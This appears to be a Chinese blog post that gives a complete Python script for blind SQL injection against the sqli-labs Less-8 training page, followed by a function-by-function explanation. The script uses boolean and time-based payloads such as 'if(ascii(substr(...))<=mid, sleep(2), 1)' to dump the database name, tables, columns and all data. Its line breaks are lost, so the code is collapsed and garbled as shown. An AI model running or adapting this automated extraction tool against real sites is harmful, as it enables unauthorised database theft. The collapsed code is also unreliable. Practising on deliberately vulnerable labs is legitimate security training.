import requests
import time# 创建会话对象,用于保持与目标服务器的会话状态,便于多次请求
session = requests.session()
# 目标URL,是存在SQL注入漏洞的页面地址
url = "http://127.0.0.1/sqlilabs/Less-8/index.php"# 通过布尔盲注获取当前使用的数据库名称
def getDatabase(url):results = []# 循环获取数据库名称的前7个字符for i in range(1, 8):# 二分查找ASCII码范围low, high = 32, 127while low <= high:mid = (low + high) // 2# 构造SQL注入参数,判断数据库名称第i个字符的ASCII码是否小于等于midpayload = {'id': f"1' and ord(substr(database(),{i},1))<={mid}--"}ret = session.get(url=url, params=payload)if 'You are in' in ret.text:high = mid - 1if low == mid:# 找到字符,添加到结果列表results.append(chr(mid))print(''.join(results))breakelse:low = mid + 1return ''.join(results)# 通过时间盲注获取查询结果
def timeBasedBlindInjection(url, query):result = ""# 循环获取结果的前100个字符for i in range(1, 100):low, high = 32, 127while low <= high:mid = (low + high) // 2# 构造时间盲注参数,若字符ASCII码小于等于mid则让服务器休眠2秒payload = {'id': f"1' and if(ascii(substr(({query}),{i},1))<={mid},sleep(2),1)--"}start = time.time()ret = session.get(url=url, params=payload)elapsed_time = time.time() - startif elapsed_time >= 2:high = mid - 1if low == mid:# 找到字符,添加到结果字符串result += chr(mid)print(result)breakelse:low = mid + 1return result# 通过布尔盲注获取查询结果
def booleanBasedBlindInjection(url, query):result = ""# 循环获取结果的前100个字符for i in range(1, 100):low, high = 32, 127while low <= high:mid = (low + high) // 2# 构造布尔盲注参数,判断结果第i个字符的ASCII码是否小于等于midpayload = {'id': f"1' and ascii(substr(({query}),{i},1))<={mid}--"}ret = session.get(url=url, params=payload)if 'You are in' in ret.text:high = mid - 1if low == mid:# 找到字符,添加到结果字符串result += chr(mid)print(result)breakelse:low = mid + 1return result# 获取指定数据库中的所有表名
def getTable(url, database_name):# 构造SQL查询语句,从系统表中获取表名query = f"select group_concat(table_name) from information_schema.tables where table_schema = '{database_name}'"return booleanBasedBlindInjection(url, query)# 获取指定数据库和表中的所有列名
def getColumn(url, database_name, table_name):# 构造SQL查询语句,从系统表中获取列名query = f"select group_concat(column_name) from information_schema.columns where table_schema = '{database_name}' and table_name = '{table_name}'"return booleanBasedBlindInjection(url, query)# 获取指定数据库、表和列中的数据
def getResult(url, database_name, table_name, column_name):# 构造SQL查询语句,获取表中指定列的数据query = f"select group_concat({column_name}) from {database_name}.{table_name}"return booleanBasedBlindInjection(url, query)# 记录程序开始时间
start = time.time()
# 获取数据库名称
database_name = getDatabase(url)
print(f"Database Name: {database_name}")# 获取数据库中的所有表名
tables = getTable(url, database_name)
print(f"Tables in {database_name}: {tables}")if tables:table_list = tables.split(',')for table in table_list:# 获取表中的所有列名columns = getColumn(url, database_name, table)print(f"Columns in {table}: {columns}")if columns:column_list = columns.split(',')for column in column_list:# 获取列中的数据data = getResult(url, database_name, table, column)print(f"Data in {table}.{column}: {data}")# 打印程序运行总耗时
print(f'time spend: {time.time() - start}')getDatabase 函数:
- 功能:获取数据库名称。
- 实现逻辑:
- 外层
for循环遍历数据库名称的每个字符位置(假设数据库名称最多 7 个字符)。 - 初始化
low和high分别为 ASCII 码的下限 32 和上限 127。 - 内层
while循环使用二分查找法,不断缩小字符 ASCII 码的范围。 - 构造 SQL 注入
payload,通过ord(substr(database(),{i},1))<={mid}判断数据库名称第i个字符的 ASCII 码是否小于等于mid。 - 发送 GET 请求,根据响应文本中是否包含
You are in来调整low和high的值。如果包含,说明目标字符的 ASCII 码小于等于mid,将high设为mid - 1;否则,将low设为mid + 1。 - 当
low和mid相等时,说明找到了正确的字符,将其添加到results列表中,并打印当前已获取的数据库名称部分。 - 最后将
results列表拼接成字符串返回。
- 外层
timeBasedBlindInjection 函数:
- 功能:基于时间盲注获取数据。
- 实现逻辑:
- 外层
for循环遍历结果字符串的每个字符位置(假设结果最多 100 个字符)。 - 初始化
low和high为 ASCII 码范围。 - 内层
while循环同样使用二分查找。 - 构造
payload,通过if(ascii(substr(({query}),{i},1))<={mid},sleep(2),1)判断,如果条件成立则执行sleep(2)函数,使服务器响应延迟 2 秒。 - 记录请求开始时间
start,发送 GET 请求后计算响应时间elapsed_time。如果响应时间大于等于 2 秒,说明目标字符的 ASCII 码小于等于mid,调整high;否则调整low。 - 找到正确字符后添加到
result字符串并打印,最后返回完整的结果字符串。
- 外层
booleanBasedBlindInjection 函数:
- 功能:基于布尔盲注获取数据。
- 实现逻辑:与
getDatabase函数类似,通过二分查找确定每个字符的 ASCII 码。构造payload判断ascii(substr(({query}),{i},1))<={mid},根据响应文本中是否包含You are in来调整low和high的值,最终获取结果字符串。
getTable 函数:
- 功能:获取指定数据库中的所有表名。
- 实现逻辑:构造 SQL 查询语句,从
information_schema.tables系统表中查询指定数据库(database_name)的所有表名,使用group_concat函数将结果合并为一个字符串。然后调用booleanBasedBlindInjection函数执行查询并返回结果。
getColumn 函数
- 功能:获取指定数据库和表中的所有列名。
- 实现逻辑:构造 SQL 查询语句,从
information_schema.columns系统表中查询指定数据库(database_name)和表(table_name)的所有列名,同样使用group_concat函数合并结果。调用booleanBasedBlindInjection函数执行查询并返回结果。
getResult 函数:
- 功能:获取指定数据库、表和列中的数据。
- 实现逻辑:构造普通的
SELECT查询语句,从指定数据库(database_name)的指定表(table_name)中查询指定列(column_name)的数据,并使用group_concat函数合并结果。调用booleanBasedBlindInjection函数执行查询并返回结果。
 "C语言100道基础拔高题(1)")